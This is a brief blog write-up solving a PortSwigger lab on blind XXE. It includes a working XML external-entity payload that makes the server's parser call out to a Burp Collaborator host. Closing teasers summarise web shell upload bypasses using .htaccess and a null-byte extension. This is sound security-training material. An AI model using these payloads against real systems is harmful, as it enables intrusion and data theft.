On this page
apsyleg1 min read
#portswigger #xxe #web-security
Blind XXE with Out-of-Band Interaction
Lab
Blind XXE with out-of-band interaction · Practitioner
Solution
Given
This lab has a "Check stock" feature that parses XML input but does not display the result.
You can detect the blind XXE vulnerability by triggering out-of-band interactions with an external domain.
To solve the lab, use an external entity to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator.
Analyzing the task
The check-stock function parses XML but doesn't show the result in the response. That means we need to use the OOB technique.
Exploitation
Find the Check stock function:
POST /product/stock
XML in the body.
OK, let's straight away add an external entity and send a request to Burp Collaborator. Payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://l9vnzxbboknpu6p5dex776v9l0ryfo3d.oastify.com"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
Lands.
Lab solved!
More in this category
Web Shell Upload via Extension Blacklist Bypass (PortSwigger Lab)
.php is blacklisted, but .htaccess uploads without complaint — we slip our own Apache config in and make the server execute shell.bug as PHP.
Web Shell Upload via Obfuscated File Extension (PortSwigger Lab)
Extension blacklist rejects .php and a double-extension shell.php.jpg is served as an image — a null byte in shell.php%00.jpg bypasses both checks.
Remote Code Execution via Web Shell Upload (PortSwigger Lab)
Avatar upload has no validation — drop a PHP web shell and read /home/carlos/secret.